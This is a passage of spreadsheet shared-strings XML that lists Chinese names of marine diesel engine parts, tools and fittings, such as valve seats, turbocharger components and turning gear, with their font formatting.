        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀座安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座加工工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆下端预紧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离器安装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀应急打开工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地脚螺栓拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MS-925 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扇形齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横向支撑布置图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横向支撑说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机横向支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力扳手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩记录仪驱动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振测量轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>牵引绳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>天圆地方</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>运输和储藏工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传送工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横向支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑车</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扩管器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车轮和飞轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器监测</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压系统工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊扣</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机</t>
    </r>
  </si>
  <si>
    <r>
      <t>CYCLO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型盘车机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>行星轮式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋钮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机脱出装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘出工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无人机舱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船级社队无人机舱要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>悬吊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>悬挂式分离机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头螺母和闷头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥面接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥面接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内螺纹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯测试单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上半轴承盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上半轴瓦</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆上轴承</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片（上半部分）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套上部绝缘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部连杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上平台排气侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上平台燃油侧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板（上半部分）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式垫片（上半部分）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部二半环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上弹簧座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部支柱</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管表</t>
    </r>
  </si>
  <si>
    <r>
      <t>U</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形管压差计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀控制块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半式阀套</t>
    </r>
  </si>
  <si>
    <r>
      <t>KK56 H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型两段式阀栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两段式阀栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀芯</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨阀机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀安装板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀针</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀开关示意图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀防护装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀保护器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆研磨机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀行程传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>叶轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旋塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气阀杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱透气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸冷却水放气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器透气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>竖直标记</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垂直排油口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壁板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>瓦锡兰材料标准</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>瓦锡兰铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗装置污水出水管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗装置进气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气门调整装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废弃门控制图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机内油水重量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气水分离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干洗及水洗布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防水灯盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防水杯试验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两位三通阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抗磨凸起打磨工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减磨环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>筋板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>楔子</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重量和重心</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管件焊接说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
